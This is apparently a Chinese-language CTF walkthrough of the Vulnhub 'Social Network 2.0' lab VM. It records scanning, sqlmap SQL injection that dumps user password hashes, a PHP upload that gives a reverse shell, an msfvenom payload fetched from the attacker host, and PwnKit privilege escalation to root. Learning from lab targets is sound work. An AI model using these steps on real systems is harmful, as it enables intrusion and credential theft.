Socnet
作者:jason huawen
靶机信息
名称:BoredHackerBlog: Social Network 2.0
地址:- https://www.vulnhub.com/entry/boredhackerblog-social-network-20,455/
- (kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
-
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
- 192.168.56.100 08:00:27:26:b1:cb 1 60 PCS Systemtechnik GmbH
- 192.168.56.169 08:00:27:5b:b3:1b 1 60 PCS Systemtechnik GmbH
NMAP扫描
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.169 -oN nmap_full_scan
- Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-22 21:56 EDT
- Nmap scan report for bogon (192.168.56.169)
- Host is up (0.00040s latency).
- Not shown: 65532 closed tcp ports (reset)
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 2048 e5:d3:4e:54:fe:66:3e:f3:b2:a5:4b:51:9f:5f:f9:c6 (RSA)
- | 256 de:86:ef:76:93:63:74:83:00:b1:a3:b8:c2:4c:8f:58 (ECDSA)
- |_ 256 b5:ec:f1:1e:9a:5a:5c:d7:02:3a:9e:1b:f7:c8:b4:53 (ED25519)
- 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
- |_http-server-header: Apache/2.4.29 (Ubuntu)
- |_http-title: Social Network
- | http-cookie-flags:
- | /:
- | PHPSESSID:
- |_ httponly flag not set
- 8000/tcp open http BaseHTTPServer 0.3 (Python 2.7.15rc1)
- |_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1
- |_xmlrpc-methods: XMLRPC instance doesn't support introspection.
- |_http-title: Error response
- MAC Address: 08:00:27:5B:B3:1B (Oracle VirtualBox virtual NIC)
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds
获得Shell
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ nikto -h http://192.168.56.169
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.168.56.169
- + Target Hostname: 192.168.56.169
- + Target Port: 80
- + Start Time: 2023-04-22 22:00:39 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache/2.4.29 (Ubuntu)
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Cookie PHPSESSID created without the httponly flag
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + OSVDB-3268: /data/: Directory indexing found.
- + OSVDB-3092: /data/: This might be interesting...
- + OSVDB-3268: /includes/: Directory indexing found.
- + OSVDB-3092: /includes/: This might be interesting...
- + OSVDB-3268: /database/: Directory indexing found.
- + OSVDB-3093: /database/: Databases? Really??
- + OSVDB-3268: /images/: Directory indexing found.
- + OSVDB-3233: /icons/README: Apache default file found.
- + 7915 requests: 0 error(s) and 14 item(s) reported on remote host
- + End Time: 2023-04-22 22:01:42 (GMT-4) (63 seconds)
- ---------------------------------------------------------------------------
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ cat DML.sql
- INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
- VALUES ("Armin", "Virgil", "armin@gmail.com", "M", "2001-02-05");
- INSERT INTO users(user_firstname, user_lastname, user_nickname, user_password, user_email, user_gender, user_birthdate, user_status)
- VALUES ("Paul", "James", "Pynch", "paul@gmail.com", "M", "1998-12-19", "S");
- INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
- VALUES ("Chris", "Wilson", "chris@gmail.com", "M", "1996-01-18");
- INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate, user_status)
- VALUES ("Rory", "Blue", "rory@gmail.com", "F", "1994-04-18", "M");
- INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
- VALUES ("Andrea", "Surman", "andrea@gmail.com", "M", "1994-06-06");
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ gobuster dir -u http://192.168.56.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.txt,.js,.bak
- ===============================================================
- Gobuster v3.5
- by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
- ===============================================================
- [+] Url: http://192.168.56.169
- [+] Method: GET
- [+] Threads: 10
- [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- [+] Negative Status codes: 404
- [+] User Agent: gobuster/3.5
- [+] Extensions: php,html,js,txt,bak
- [+] Timeout: 10s
- ===============================================================
- 2023/04/22 22:06:30 Starting gobuster in directory enumeration mode
- ===============================================================
- /.php (Status: 403) [Size: 293]
- /images (Status: 301) [Size: 317] [--> http://192.168.56.169/images/]
- /.html (Status: 403) [Size: 294]
- /index.php (Status: 200) [Size: 10609]
- /search.php (Status: 302) [Size: 1490] [--> index.php]
- /home.php (Status: 302) [Size: 4234] [--> index.php]
- /resources (Status: 301) [Size: 320] [--> http://192.168.56.169/resources/]
- /profile.php (Status: 302) [Size: 2845] [--> index.php]
- /data (Status: 301) [Size: 315] [--> http://192.168.56.169/data/]
- /includes (Status: 301) [Size: 319] [--> http://192.168.56.169/includes/]
- /friends.php (Status: 302) [Size: 1669] [--> index.php]
- /database (Status: 301) [Size: 319] [--> http://192.168.56.169/database/]
- /logout.php (Status: 302) [Size: 0] [--> index.php]
- /functions (Status: 301) [Size: 320] [--> http://192.168.56.169/functions/]
- /requests.php (Status: 302) [Size: 1719] [--> index.php]
- /.php (Status: 403) [Size: 293]
- /.html (Status: 403) [Size: 294]
- /server-status (Status: 403) [Size: 302]
- Progress: 1322305 / 1323366 (99.92%)
- ===============================================================
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ curl http://192.168.56.169:8000/
- <head>
- <title>Error response</title>
- </head>
- <body>
- <h1>Error response</h1>
- <p>Error code 501.
- <p>Message: Unsupported method ('GET').
- <p>Error code explanation: 501 = Server does not support this operation.
- </body>
但是返回是空的,没有任何内容
利用Gobuster工具,并且这只-m 请求方法参数,对8000端口进行扫描
注册一个新用户,然后登陆,有个搜索功能,貌似有SQL注入漏洞,用burpsuite拦截请求,并存储为文件- http://192.168.56.169/search.php?location=emails&query=test
- (kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ sqlmap -r req.txt --level=3
- ─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ sqlmap -r req.txt --level=3 --dbsavailable databases [5]:
- [*] information_schema
- [*] mysql
- [*] performance_schema
- [*] socialnetwork
- [*] sys
- ─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ sqlmap -r req.txt --level=3 -D socialnetwork --tablesDatabase: socialnetwork[4 tables]+------------+| friendship || posts || user_phone || users |+------------+
- ─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users --columnsDatabase: socialnetworkTable: users[11 columns]+----------------+--------------+| Column | Type |+----------------+--------------+| user_about | text || user_birthdate | date || user_email | varchar(255) || user_firstname | varchar(20) || user_gender | char(1) || user_hometown | varchar(255) || user_id | int(11) || user_lastname | varchar(20) || user_nickname | varchar(20) || user_password | varchar(255) || user_status | char(1) |+----------------+--------------+
- ─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users -C user_email,user_password --dumpTable: users[3 entries]+------------------------+----------------------------------+| user_email | user_password |+------------------------+----------------------------------+| admin@localhost.com | 21232f297a57a5a743894a0e4a801fc3 || testuser@localhost.com | 5d9c68c6c50ed3d02a2fcf54f63993b6 || test@test.com | e10adc3949ba59abbe56e057f20f883e |+------------------------+----------------------------------+
没有任何过滤机制,成功上传shell.php文件,拿到目标主机反弹的shell- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ sudo nc -nlvp 5555
- [sudo] password for kali:
- listening on [any] 5555 ...
- connect to [192.168.56.230] from (UNKNOWN) [192.168.56.169] 38434
- Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
- 02:40:11 up 47 min, 0 users, load average: 0.05, 0.31, 0.75
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- /bin/sh: 0: can't access tty; job control turned off
- $ which python
- /usr/bin/python
- $ python -c 'import pty;pty.spawn("/bin/bash")'
- www-data@socnet2:/$ cd /home
- cd /home
- www-data@socnet2:/home$ ls -alh
- ls -alh
- total 12K
- drwxr-xr-x 3 root root 4.0K Oct 29 2018 .
- drwxr-xr-x 25 root root 4.0K Oct 29 2018 ..
- drwxr-xr-x 6 socnet socnet 4.0K Oct 29 2018 socnet
- ──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
- └─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf
- www-data@socnet2:/tmp$ wget http://192.168.56.230:8000/escalate.elf
- wget http://192.168.56.230:8000/escalate.elf
- --2023-04-23 02:55:00-- http://192.168.56.230:8000/escalate.elf
- Connecting to 192.168.56.230:8000... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 207 [application/octet-stream]
- Saving to: 'escalate.elf'
- escalate.elf 100%[===================>] 207 --.-KB/s in 0s
- 2023-04-23 02:55:00 (39.3 MB/s) - 'escalate.elf' saved [207/207]
- www-data@socnet2:/tmp$ chmod +x escalate.elf
- chmod +x escalate.elf
- msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
- msf6 post(multi/recon/local_exploit_suggester) > show options
- Module options (post/multi/recon/local_exploit_suggester):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- SESSION yes The session to run this module on
- SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
- msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
- SESSION => 1
- msf6 post(multi/recon/local_exploit_suggester) > run
- [*] 192.168.56.169 - Collecting local exploits for x86/linux...
- [*] 192.168.56.169 - 167 exploit checks are being tried...
- [+] 192.168.56.169 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
- [+] 192.168.56.169 - exploit/linux/local/nested_namespace_idmap_limit_priv_esc: The target appears to be vulnerable.
- [+] 192.168.56.169 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
- [+] 192.168.56.169 - exploit/linux/local/pkexec: The service is running, but could not be validated.
- [+] 192.168.56.169 - exploit/linux/local/su_login: The target appears to be vulnerable.
- [*] Running check method for exploit 48 / 48
- [*] 192.168.56.169 - Valid modules for session 1:
- ============================
- # Name Potentially Vulnerable? Check Result
- - ---- ----------------------- ------------
- 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
- msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
- [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
- msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
- Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- PKEXEC_PATH no The path to pkexec binary
- SESSION yes The session to run this module on
- WRITABLE_DIR /tmp yes A directory where we can write files
- Payload options (linux/x64/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- LHOST 10.0.2.15 yes The listen address (an interface may be specified)
- LPORT 4444 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 x86_64
- msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
- LHOST => 192.168.56.230
- msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
- LPORT => 8888
- msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
- SESSION => 1
- msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
- [*] Started reverse TCP handler on 192.168.56.230:8888
- [*] Running automatic check ("set AutoCheck false" to disable)
- [!] Verify cleanup of /tmp/.dmofmj
- [+] The target is vulnerable.
- [*] Writing '/tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so' (548 bytes) ...
- [!] Verify cleanup of /tmp/.ebvnqpec
- [*] Sending stage (3020772 bytes) to 192.168.56.169
- [+] Deleted /tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so
- [+] Deleted /tmp/.ebvnqpec/.omnoepjvoqxi
- [+] Deleted /tmp/.ebvnqpec
- [*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.169:33970) at 2023-04-23 02:30:11 -0400
- meterpreter > shell
- Process 1899 created.
- Channel 1 created.
- id
- uid=0(root) gid=0(root) groups=0(root),33(www-data)
- cd /root
- ls -alh
- total 32K
- drwx------ 4 root root 4.0K Oct 29 2018 .
- drwxr-xr-x 25 root root 4.0K Oct 29 2018 ..
- -rw------- 1 root root 5 Oct 29 2018 .bash_history
- -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
- drwxr-xr-x 3 root root 4.0K Oct 29 2018 .local
- -rw------- 1 root root 128 Oct 29 2018 .mysql_history
- -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
- drwx------ 2 root root 4.0K Oct 29 2018 .ssh
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
